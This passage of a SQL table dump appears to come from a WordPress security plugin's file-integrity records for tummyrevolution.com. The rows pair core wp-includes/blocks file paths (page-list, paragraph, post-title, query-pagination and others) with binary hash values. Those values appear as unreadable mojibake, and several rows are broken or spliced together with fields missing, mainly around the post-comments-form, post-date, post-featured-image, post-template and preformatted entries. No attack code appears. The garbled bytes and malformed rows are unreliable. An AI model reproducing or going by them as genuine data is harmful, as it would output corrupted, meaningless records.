','wp-includes/blocks/page-list/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ent<4\0eJ',' 4숐7oD74:J[','',0,'?'),('Ph~P','wp-includes/blocks/page-list/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8 x vR<','II|{8ʰ$Ni0<&[vHV^','',0,'?'),('DQ#unU\\ @<','wp-includes/blocks/page-list/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ent<4\0eJ',' 4숐7oD74:J[','',0,'?'),('\0XL&\Zf','wp-includes/blocks/page-list-item/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list-item/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1-: 1a#@[','S2T%\'73-* zѩb','',0,'?'),('wpmTc','wp-includes/blocks/page-list-item.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m0ejo`i','-DJ@o\ZfAg\'N8O\Z`(','',0,'?'),(')警QQ/Y9','wp-includes/blocks/page-list.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','34Ju\0','zjΤ|\Z Vh%9z ڑ','',0,'?'),('\\h\Z)Ġ','wp-includes/blocks/paragraph/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i=D+=','6v fVqY3IlQώ=','',0,'?'),('o ǻ &c','wp-includes/blocks/paragraph/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"a\' b+0ԙ«O','(w m¤b\Z:7=1','',0,'?'),('?϶^7:y','wp-includes/blocks/paragraph/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RH‚ ;','i7j ;W;).ETPt8','',0,'?'),('ޠqDb,','wp-includes/blocks/paragraph/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"a\' b+0ԙ«O','(w m¤b\Z:7=1','',0,'?'),('jU30<gb','wp-includes/blocks/paragraph/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RH‚ ;','i7j ;W;).ETPt8','',0,'?'),('}-$LH_R','wp-includes/blocks/paragraph/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vz/\r{;','Ʀ [rGkbJa/!Jz8','',0,'?'),('+(-V&S_2X7f','wp-includes/blocks/paragraph/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/paragraph/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','::p7I','\Z7˖r3e04x','+]|1ϣ@O-$','',0,'?'),('O2ɂH!֒[=','wp-includes/blocks/pattern/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pattern/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'1 B}蕈[','.io\'O!A~ۿ+\Z *Na','',0,'?'),('&͂|d8','wp-includes/blocks/pattern.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pattern.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kl40tv53','Qj~ oBe0LQ]Yg7 ޛs','',0,'?'),('c1;!oe','wp-includes/blocks/post-author/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!(㶕fVo&_','J#I\09t!\"׳\\I5','',0,'?'),('?hh:z͏qZiV','wp-includes/blocks/post-author-biography.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author-biography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']0 ڙZ\'f','mvE;t!XR.CEcRJn','',0,'?'),(' W,@{?9','wp-includes/blocks/post-author-name/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author-name/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gzo{.vr','q ~bjb\n]Ѽ4Q= ','',0,'?'),('64oo7!6','wp-includes/blocks/post-author-name.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author-name.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؽj#TiPoPC','l*TC 8\"^','',0,'?'),('AaKo+O','wp-includes/blocks/post-author.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/}_G[ʼnn','EMڀl- @HbNuI<\n','',0,'?'),(':v\0֌s','wp-includes/blocks/post-comments-form/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nI gZ\\','W\'ߥ0H/N|+oVf','',0,'?'),('GQ{)?R`)','wp-includes/blocks/post-comments-form/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1{ⱄk_Bv(','k-\n!5$ɡ4]','wp-includes/blocks/post-comments-form/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쮛9\n.ha=8',' b?C=P\nEHgpE','',0,'?'),('Tp0]ob[','wp-includes/blocks/post-comments-form/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1{ⱄk_Bv(','k-\n!5]','wp-includes/blocks/post-comments-form.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-comments-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n݈,aCHfǷ','ɃrŐtE\r.:G-Q8W6 G=%fd','',0,'?'),('ٱMPrh~','wp-includes/blocks/post-content/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-content/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj~r(K~&2Js','D2kdgX|(C','',0,'?'),('5;T]\0”','wp-includes/blocks/post-content.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P SVz@k','̎TSd?9\"kN\0\'','',0,'?'),(' Phui8V\0kU','wp-includes/blocks/post-date/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t ڮ-v','ac','wp-includes/blocks/post-date/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3٦>L\'','?ahƖov 5nh','',0,'?'),(';\n7ړ4t>J','wp-includes/blocks/post-date/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=aV','C`bH&2*6Թ(]3\\nڶ}','',0,'?'),('wB~~BP8','wp-includes/blocks/post-date/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3٦>L\'','?ahƖov 5nh','',0,'?'),('CKJ6LAMkV','wp-includes/blocks/post-date.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=^/YP','dnP','wp-includes/blocks/post-excerpt/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͐/-\0I]T~ ','a&jf#\Z-CxWOnpj','',0,'?'),('ϝ6=̍','wp-includes/blocks/post-excerpt/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e̅bJ&^ŧ','2u lxDg/v','',0,'?'),('XN8jc','wp-includes/blocks/post-excerpt/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͐/-\0I]T~ ','a&jf#\Z-CxWOnpj','',0,'?'),('awU\ZTzK','wp-includes/blocks/post-excerpt/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e̅bJ&^ŧ','2u lxDg/v','',0,'?'),('BJ<`','wp-includes/blocks/post-excerpt.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hSL.gB:','dǠ#$AY>jc15g=^','',0,'?'),('\n MI~YEO]','wp-includes/blocks/post-featured-image/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׿n*=J','3v@`Ƙ䋙QiKRu\rZRq3X','',0,'?'),('fFAlUp','wp-includes/blocks/post-featured-image/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Xyĵ','$\\ 2u:FR 8','',0,'?'),('LEgF9','wp-includes/blocks/post-featured-image/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H(;/','&3?ؾ\"1T)E\\','',0,'?'),('mӟa','wp-includes/blocks/post-featured-image/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Ǭ=##`JSR','Gd ?d','wp-includes/blocks/post-featured-image/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u b1TW GW','yBOne\n6Af\0x','p1dsI\\DbJ̖P1lt<','',0,'?'),('{{8B%@\0x','wp-includes/blocks/post-featured-image/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v< ?cn;','3\'(\'A$ƃ?G\"Q','',0,'?'),('rsa9SUU','wp-includes/blocks/post-featured-image/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؆>f\0x','p1dsI\\DbJ̖P1lt<','',0,'?'),('ji \nT槿\r','wp-includes/blocks/post-featured-image.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':,~2oy','muk_s$vkJ6:\'','',0,'?'),('H|\0`B*Q','wp-includes/blocks/post-navigation-link/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','whm\'DQ','l-T JI7Jg:Ja+','',0,'?'),('/[/Z','wp-includes/blocks/post-navigation-link/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nR(zJ,q3','G` 0t Ԅ?S\'$\n?*L','',0,'?'),('γy\06ϛ\0^ =@','wp-includes/blocks/post-navigation-link/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cbr:','A!Dg$;~ِoP;{','',0,'?'),('uWۓWP^(L','wp-includes/blocks/post-navigation-link/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OvSi?\0Â(','ŶCϭhF0:2Iv\ZT','',0,'?'),('#\\7\ZhGl','wp-includes/blocks/post-navigation-link/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r[u׀?vFq!u','R/(+\" ~$W\r@]c=@Jw\ZG','',0,'?'),('?i.Q[E','wp-includes/blocks/post-navigation-link.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-navigation-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4\nja=$/','.iأ^jV|?뵻>yg','',0,'?'),('%fNvn9,\rW','wp-includes/blocks/post-template/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ڟX>٫','tsw08<脪DF%l','',0,'?'),('sDI6|U_','wp-includes/blocks/post-template/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KkD\'2','E2찁;+i_B;l*.B','',0,'?'),(' M}n\"4jdR','wp-includes/blocks/post-template/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ÃNʅ\nN;,k0f',' CJ-j\"XUZuޟȱ','',0,'?'),('*&5,qV׷0v c','wp-includes/blocks/post-template/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LX#R\Z<','=NB]u9a +855#p','',0,'?'),('O>Pw^YX','wp-includes/blocks/post-template/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-template/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p9¿(Vq$','$U$g@It6ot+','wp-includes/blocks/post-terms/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t}WO.P)','IY.fQ$Jrs\Z6\0B\"Rb','',0,'?'),('v>\nA?U(','wp-includes/blocks/post-terms/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\"h','@\Z\' _:e$)nF','',0,'?'),(';Q}]]UK}9o','wp-includes/blocks/post-terms/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z^k Nұ\Z)','?㷷(s\'˭#l<RTe','',0,'?'),('&𐯧o]3+g','wp-includes/blocks/post-terms/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\"h','@\Z\' _:e$)nF','',0,'?'),(' cO4ĨǖM','wp-includes/blocks/post-terms/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z^k Nұ\Z)','?㷷(s\'˭#l<RTe','',0,'?'),('vyLe!','wp-includes/blocks/post-terms.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-terms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','skrcF6X','udkj<(ƧӜO5J1(D','',0,'?'),('pŧ\n+R2Zb','wp-includes/blocks/post-title/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Ҽ4ʞ','4ؽh{kX=aDc34Hhk2','',0,'?'),('seQr^TK','wp-includes/blocks/post-title/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 8XoYc ','oWBxp\'.uZ^2c','',0,'?'),('rN(M\\','wp-includes/blocks/post-title/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}kRp$Ŷ','.µ&;i`?t\rI3ϓL&<','',0,'?'),('e7F%','wp-includes/blocks/post-title/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 8XoYc ','oWBxp\'.uZ^2c','',0,'?'),('\rW$2lv9{ܭ:','wp-includes/blocks/post-title/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}kRp$Ŷ','.µ&;i`?t\rI3ϓL&<','',0,'?'),('Xg#m\rfj7 m^','wp-includes/blocks/post-title.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/post-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C1P5!0','M+r⺔#2SA4GOB0>d','',0,'?'),('%]M3T1T/','wp-includes/blocks/preformatted/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/preformatted/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HZ;* Y۞m','wp-includes/blocks/preformatted/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/preformatted/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OoJ}[׻W','mA-`8 P ay< (','',0,'?'),('c8xϵ','wp-includes/blocks/preformatted/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/preformatted/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SG{Ĉ]51','_ pc)k 3YHLIWOP]9tS','',0,'?'),('PHZ`=','wp-includes/blocks/pullquote/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FSB\\>','X,];+_FoB5~R,eV','',0,'?'),('Z*Է!\"E\Z@','wp-includes/blocks/pullquote/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J}Y','FF8QΑyޖ/W-ͣÍ+K[','',0,'?'),('M{xJH','wp-includes/blocks/pullquote/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i}}OaX`','5h3D !У^Iun+/_u','',0,'?'),('3XG%','wp-includes/blocks/pullquote/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J}Y','FF8QΑyޖ/W-ͣÍ+K[','',0,'?'),('?H4 V\n','wp-includes/blocks/pullquote/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i}}OaX`','5h3D !У^Iun+/_u','',0,'?'),('x.XJ$ɮܹ','wp-includes/blocks/pullquote/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۆr9Z','u.=VgMBÎפhq','',0,'?'),('ZAPz','wp-includes/blocks/pullquote/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5mb,.\0$_7','e߾=KpE?oNc*V(g','',0,'?'),('r\"%1}/2Y','wp-includes/blocks/pullquote/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','opl;}}i','O_C(H\'Z0MlcHSتO','',0,'?'),('UAQ,Uq','wp-includes/blocks/pullquote/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')pC>x쁧Nn',' r()/d&]MbeDZ`D6T','',0,'?'),(' \r-Uz\raK','wp-includes/blocks/pullquote/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/pullquote/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T_W1=\"0','%8 !KHӄB E\r<߬wX?I$VЩb@6G:u','',0,'?'),('s&^\"WD=','wp-includes/blocks/query/view.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/view.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v7> ,.#M','ZL96>ݢc\ZӼA-+','',0,'?'),('HL<̑5','wp-includes/blocks/query/view.js','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̳YKܕ\0C1_/','fmc!3<Z4$4AZsZh6','',0,'?'),('ћXClBȆ,','wp-includes/blocks/query/view.min.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/view.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{붉CXF)D{','8Z/qlðЭ[ba­;f4','',0,'?'),('9}#Ɓ','wp-includes/blocks/query/view.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query/view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*fO%Su;','jإ+Pd-fm!3*tR0XO4','',0,'?'),('19WuӀ4B','wp-includes/blocks/query-no-results/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-no-results/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8 AF()m\0K','+Ԗ-Mu_ާl3Vel}BE#','',0,'?'),('B3\rqel L','wp-includes/blocks/query-no-results.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\hRyZgR','ᜤaCR!i^)L81Adb4D%e','',0,'?'),('\'VB~w','wp-includes/blocks/query-pagination/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\rӁLV#0','*8:1d4w`0y&D','',0,'?'),('T`52z/>w','wp-includes/blocks/query-pagination/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̌\\SN5J ','7:NyIN[g4Ơ޺O }qF','',0,'?'),('/}¦kAZj','wp-includes/blocks/query-pagination/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~u dN','$ԡixr:`kGr?Չ','',0,'?'),('S?dxSَ@','wp-includes/blocks/query-pagination/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AL4vKpA\\','Uϵ Rxvqͧ%Ήzu*l','',0,'?'),('I\r8p:́ ޞ}`\Z','wp-includes/blocks/query-pagination/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c&GQup','3?/,([+\nR*2/$}','',0,'?'),('0\Z/1~','wp-includes/blocks/query-pagination/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c QspgY;','zmFC%pPY$ihL','',0,'?'),('L\Z ','wp-includes/blocks/query-pagination/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.B!N|',':CEX>ҋScѵƞ%EH/','',0,'?'),('ugkDEK','wp-includes/blocks/query-pagination-numbers/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ni%Y0>','p;Ħ\'zj f(o|!Xh1,֝|','',0,'?'),('Nsf#@Q;;{̻','wp-includes/blocks/query-pagination-numbers/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P,#0O%<8|','qniȅ\nфo3Q۾-NP3NH','',0,'?'),(' y>4lgR','wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gZ 8Z','y qkj|gY{','',0,'?'),('{hB-o:Ih','wp-includes/blocks/query-pagination-numbers/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@E(1˱eB','O;\nV[%\Z3Eh dx:{','',0,'?'),('D (,|b?L','wp-includes/blocks/query-pagination-numbers/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e*l: \\w','w9C1\'$IN+3ں$s','',0,'?'),('\0,#heLG(}','wp-includes/blocks/query-pagination-numbers.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-numbers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZHa9\r','AԮ$n &,~#3tfqE0','',0,'?'),('z2]w\'=\"-4','wp-includes/blocks/query-pagination-previous/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-previous/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','> Ϛߕ5fM\'mA','-tp1<{ 7AX`o','',0,'?'),('Vi\'Ruh:u','wp-includes/blocks/query-pagination-previous.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination-previous.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S<ֱ҅\\E n)]G','\'v`)VT!$.SpRu','',0,'?'),('9 {b\nJcF=lY','wp-includes/blocks/query-pagination.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b5` M3a5','TU-n %IeiC7􄏫J} >','',0,'?'),('y32/[X#F','wp-includes/blocks/query-title/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v3YI@qΗ','%׋v?\\)Ǝ164Q\0Ok\Z','',0,'?'),('ݲg>:[tQV','wp-includes/blocks/query-title/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9-mCl-h','i)!nle# aniqla\nOX','',0,'?'),('`\0WLH&','wp-includes/blocks/query-title/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']l¥ˀ3','d\"Q٥[Rf?а-[1#xr,md\r_','',0,'?'),('HY/,Fv','wp-includes/blocks/query-title/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9-mCl-h','i)!nle# 